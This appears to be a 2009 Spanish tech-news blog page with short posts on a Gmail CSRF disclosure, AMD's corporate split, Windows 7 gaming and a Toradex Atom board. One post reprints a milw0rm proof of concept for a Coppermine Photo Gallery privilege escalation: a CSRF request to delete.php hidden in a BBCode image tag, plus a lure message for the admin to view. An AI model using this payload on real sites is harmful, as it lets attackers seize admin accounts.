El descubridor es un español (Vicente Aguilera, de ISecAuditors) que ha decidido publicar hoy una descripción y prueba de concepto.

Se trata de una vulnerabilidad del tipo CSRF, que permitiría a un atacante cambiar la contraseña de un usuario de Gmail sin su conocimiento.

Via kriptopolis

martes, 3 de marzo de 2009

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation

+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message

hey admin,nice web site :)
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]

+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+

# milw0rm.com [2009-02-26]

AMD se divide

Hace tiempo que se anunció la división de la empresa en dos compañías independientes y muy orientadas a su propia visión de negocio, y ahora dicho proyecto se ha completado con un único objetivo: competir con más garantías frente a Intel.

La empresa AMD que mantendrá ese nombre se centrará en el diseño y desarrollo de los procesadores y chips gráficos (y chipsets) tradicionales, y dispondrá de una plantilla de 11.000 trabajadores.

Por su parte, la temporalmente llamada The Foundry Company se llevará a 3.000 empleados y se encargará de la producción de esos chips de AMD. Ambas empresas tendrán un accionista mayoritario común, el gobierno de Abu Dhabi a través de la empresa llamada Advanced Technology Investement Corp (ATIC) controlada por Mubadala Development Co.

Via theinquirer

domingo, 1 de marzo de 2009

Windows 7 "será excelente para los videojuegos", dijo Microsoft


Así lo prometió Chris Lewis, vicepresidente de Microsoft para el negocio de entretenimiento interactivo. Mencionó que el sucesor del Windows Vista es "más robusto y rápido" como plataforma para videogames







"Windows 7 será excelente para juegos, sin dudas". "Son todas buenas noticias. Es más robusto y rápido, y los ciclos de pruebas están revelando muchas promesas".

Esas son las principales definiciones que entregó el ejecutivo de Microsoft sobre el comportamiento de los videogames en Windows 7 frente al Vista.

En una entrevista con GamesIndustry, Lewis agregó que el sistema operativo seguirá apoyándose en la plataforma Games for Windows, sello con el que se publican miles de videojuegos compatibles con ese sistema operativo.

Actualmente, los altos requerimientos de memoria del Windows Vista obligan a tener una placa de video potente para poder disfrutar de un juego de manera adecuada.

En igual sentido, explicó que la compañía seguirá trabajando en el desarrollo de videojuegos.

“Estamos encantados, muy conscientes de que hay una fuerte comunidad de gamers”, dijo y agregó que “no todos los juegos de consola se prestan para la PC. Cuando es apropiado brindamos ambas posibilidades y sino no lo hacemos. Seguiremos haciendo eso”.

“Ambas plataformas pueden coexistir muy bien, y como compañía estamos en una muy buena y única posición acerca de que tenemos un legado en la PC. Seguiremos enfocados en ello”, remató el ejecutivo.

Via infobae

Tarjetas madre con procesador Intel Atom del tamaño de una tarjeta de credito

La empresa Toradex sacó a la venta placas del tamaño de una tarjeta de crédito, y aunque el tammaño de las tarjetas es bastante pequeño sus características son muy buenas, veamos:








CPU:
Intel® Atom™ Z530
1.6 GHz
533MHz Front Side Bus

Memory:
32kByte Instruction Cache
24kByte L1 Cache
512kByte L2 Cache
Hyper Thread
512MB DDR2 533 MHz (on board)
2GB Solid State Flash Disk (on board)

Chipset and Video Controller:
Intel® System Controller Hub US15W
Integrated Intel® Graphics, Intel® GMA 500
Dual Independent Screen
HDTV/HD capable
Decoder for MPEG2(HD) /H2.64

Interfaces:
1 PCIe x1 (externally available)
ExpressCard
10/100/1000 Mbit LAN
Intel® High Definition Audio (24bit/96kHz)
1 Serial ATA (via IDE Bridge)
7x USB 2.0 (1 channel configurable as client)
MicroSD slot on board
2 SDIO (4/8bit)
LVDS Single Channel 18/24 bit WXGA 1366x768
VGA out
TV out
LPC
SMB
I2C (via
Embedded Controller)
8 GPIO (via Embedded Controller)

Supported Operating Systems:
Windows XP, XP Embedded, Vista
Windows CE 6.0
Linux
VxWorks

Available Carrier Boards:
Lily (COM Express Type 1 Version)

This is a modification of the COM Express Type 2 Carrier Board for Woodpecker:
- only one COM Express connector (COM Express Type 1)
- no Chrontel SDVO to VGA DAC (VGA directly available on Robin)
- no PATA interface
- only one SD Card slot


Revisar precios


Via theinquirer

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)